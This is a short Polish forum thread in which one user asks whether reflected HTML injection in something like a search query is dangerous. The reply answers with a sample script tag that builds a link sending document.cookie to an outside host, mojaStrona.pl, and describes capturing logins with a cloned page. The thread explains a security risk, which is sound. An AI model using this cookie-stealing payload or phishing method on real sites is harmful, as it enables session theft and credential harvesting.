![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 36 Pomógł: 1 Dołączył: 12.06.2006 Ostrzeżenie: (0%) ![]() ![]() |
Html injection - czy może być naprawdę groźne, jeśli założymy, że zachodzi tylko na danych wyświetlanych jednemu użytkownikowi, tymczasowo (np zapytanie do szukarki). Oczywiste jest że jest destruktywne na forach czy systemach komentarzy bo szpeci, ale czy może być groźne dla serwera / aplikacji?
|
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 6 476 Pomógł: 1306 Dołączył: 6.08.2006 Skąd: Kraków Ostrzeżenie: (0%) ![]() ![]() |
Bardzo prosto jest zmylić kogoś, by kliknął w link, któremu uwać nie powinien:
Kod wejdź na <script type="text/javascript">document.write('<a href="http://mojaStrona.pl/?c=' + escape(document.cookie) + '">http://forum.php.pl/e_t109179.html</a>');</script> i poszukaj... Przy czym na mojaStrona.pl może dojść do zapisania danych i przekierowania na Temat: e aby ofiara nawet nie była świadoma, że coś jest nie tak. Równie dobrze można też wyświetlić identyczną stronę (jak docelowa), ale wszystkie dane wprowadzone przez użytkownika zapisywać (loginy, hasła itp.)
|
|
|
![]() ![]() |
![]() |
Aktualny czas: 16.10.2025 - 22:15 |